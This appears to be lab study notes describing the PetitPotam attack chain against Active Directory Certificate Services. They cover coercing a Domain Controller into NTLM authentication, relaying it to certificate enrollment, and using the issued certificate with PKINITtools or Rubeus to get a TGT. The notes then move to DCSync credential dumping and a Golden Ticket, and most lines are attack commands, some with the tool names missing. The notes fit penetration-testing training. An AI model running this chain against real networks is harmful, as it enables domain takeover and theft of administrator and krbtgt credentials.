The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC)
This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS)
A new digital certificate is made.This certificate can then be used with a tool such as Rubeus or from PKINITtools to request a TGT for the Domain Controller, which can then be used to achieve domain compromise via a DCSync attack.
For more on NTLM relaying to AD CS and the PetitPotam attack.
There is also a powershell version Invoke-PetitPotam.ps1
sudo -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
We get base64 encoded certificate
python3 /opt/PKINITtools/ INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache
Set the KRB5CCNAME and do: -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Use the AS-ReP encryption key from when we requested TGT
python /opt/PKINITtools/ -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$
Then secretsdump: -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@ -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba
Alternatively, once we obtain the base64 certificate via, we could use the certificate with the Rubeus tool on a Windows attack host to request a TGT ticket and perform a pass-the-ticket (PTT) attack all at once.
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC...SNIP...IkHS2vJ51Ry4= /ptt
lsadump::dcsync /user:inlanefreight\krbtgt
Then Golden Ticket